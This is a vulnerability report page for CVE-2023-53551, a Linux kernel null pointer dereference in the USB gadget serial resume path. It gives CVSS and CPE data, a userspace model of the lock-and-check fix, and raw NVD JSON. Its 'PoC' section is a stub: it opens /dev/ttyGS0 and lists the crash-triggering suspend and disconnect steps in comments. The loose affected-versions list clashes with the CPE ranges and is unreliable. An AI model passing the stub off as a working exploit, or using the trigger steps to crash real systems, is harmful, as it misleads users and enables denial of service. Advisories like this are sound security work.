Security Vulnerability Report
CVE-2023-53551 CVSS 5.5 MEDIUM

CVE-2023-53551

Published: 2025-10-04 16:15:50
Last Modified: 2026-03-21 00:33:45
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

usb: gadget: u_serial: Add null pointer check in gserial_resume

Consider a case where gserial_disconnect has already cleared gser->ioport. And if a wakeup interrupt triggers afterwards, gserial_resume gets called, which will lead to accessing of gser->ioport and thus causing null pointer dereference. Add a null pointer check to prevent this.

Added a static spinlock to prevent gser->ioport from becoming null after the newly added check.
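
The check-under-lock pattern the description refers to, as an added userspace example (not the kernel patch and not code from this record). The struct layouts, the model_* names, the atomic_flag standing in for the static spinlock, and the return codes are assumptions made for illustration.

```c
/* Userspace model of the race in the description; not the kernel patch.
 * Struct layouts, model_* names and return codes are assumptions. */
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>
struct gs_port { bool suspended; };
struct gserial { struct gs_port *ioport; };

/* Stands in for the static spinlock the fix adds. */
static atomic_flag model_lock = ATOMIC_FLAG_INIT;
static void model_lock_acquire(void) { while (atomic_flag_test_and_set(&model_lock)) { } }
static void model_lock_release(void) { atomic_flag_clear(&model_lock); }

/* Models gserial_disconnect: clears gser->ioport under the lock. */
void model_disconnect(struct gserial *gser)
{
    model_lock_acquire();
    gser->ioport = NULL;
    model_lock_release();
}

/* Pre-fix shape of resume, for contrast only (never called here). */
void model_resume_unchecked(struct gserial *gser)
{
    gser->ioport->suspended = false; /* NULL dereference after disconnect */
}

/* Post-fix shape: test the pointer while holding the same lock, so
 * disconnect cannot clear it between the check and the use.
 * Returns 0 if the port was resumed, -1 if it was already gone. */
int model_resume(struct gserial *gser)
{
    int ret = -1;
    model_lock_acquire();
    if (gser->ioport) {
        gser->ioport->suspended = false;
        ret = 0;
    }
    model_lock_release();
    return ret;
}

int main(void)
{
    struct gs_port p = { true };
    struct gserial g = { &p };
    model_disconnect(&g);             /* disconnect wins the race */
    return model_resume(&g) == -1 ? 0 : 1;
}
```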

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.8, before 5.10.171) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.11, before 5.15.97) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.16, before 6.1.15) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2, before 6.2.2) - VULNERABLE
Linux Kernel < 6.6 (affected stable versions)
Linux Kernel 6.6.x (some versions affected)
Linux Kernel 6.1.x LTS (some versions affected)
Linux Kernel 5.15.x LTS (some versions affected)
Linux Kernel 5.10.x LTS (some versions affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC for CVE-2023-53551 - Linux Kernel USB Gadget u_serial Null Pointer Dereference
// This PoC demonstrates the race condition trigger concept
// Note: Actual exploitation requires kernel module loading or specific USB device setup
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sys/ioctl.h>
#include <linux/usbdevice_fs.h>

// Step 1: Open USB gadget serial device
int open_gserial() {
    int fd = open("/dev/ttyGS0", O_RDWR | O_NONBLOCK);
    if (fd < 0) {
        perror("Failed to open /dev/ttyGS0");
        return -1;
    }
    return fd;
}

// Step 2: Trigger the race condition
// The actual trigger requires:
// 1. Loading the g_serial kernel module
// 2. Configuring USB gadget
// 3. Suspending the system
// 4. Disconnecting during suspend
// 5. Triggering wakeup interrupt
int trigger_vuln() {
    // This is a conceptual PoC - actual exploitation requires kernel-level access
    printf("Triggering CVE-2023-53551 race condition...\n");
    // The vulnerability is in gserial_resume accessing gser->ioport
    // after gserial_disconnect has set it to NULL
    // Kernel-level trigger sequence:
    // 1. modprobe g_serial (load the vulnerable module)
    // 2. echo mem > /sys/power/state (suspend system)
    // 3. Disconnect USB device (triggers gserial_disconnect -> ioport = NULL)
    // 4. USB wakeup event (triggers gserial_resume -> NULL dereference)
    return 0;
}

int main() {
    int fd = open_gserial();
    if (fd >= 0) {
        trigger_vuln();
        close(fd);
    }
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53551", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:50.370", "lastModified": "2026-03-21T00:33:44.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: u_serial: Add null pointer check in gserial_resume\n\nConsider a case where gserial_disconnect has already cleared\ngser->ioport. And if a wakeup interrupt triggers afterwards,\ngserial_resume gets called, which will lead to accessing of\ngser->ioport and thus causing null pointer dereference.Add\na null pointer check to prevent this.\n\nAdded a static spinlock to prevent gser->ioport from becoming\nnull after the newly added check."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.8", "versionEndExcluding": "5.10.171", "matchCriteriaId": "1C6103A0-B2DA-4343-BE7F-420AD9C3E9F5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.97", "matchCriteriaId": "293EA4A4-1DE5-4552-BD15-AC8E7AA768A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": 
"5.16", "versionEndExcluding": "6.1.15", "matchCriteriaId": "E106F039-DB1A-42B7-B7E5-2DC9016A98AF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.2", "matchCriteriaId": "560CE063-53C3-4B4D-8FAC-615D86B8D3DB"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3b24c980dc07be4550a9d1450ed7057f882530e5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/44e004f757a7ae13dfebaadbcfdb1a6f98c10377", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5ec63fdbca604568890c577753c6f66c5b3ef0b5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c5360eec648bd506afa304ae4a71f82e13d41897", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ec357cd3e8af614855d286dd378725cdc7264df6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}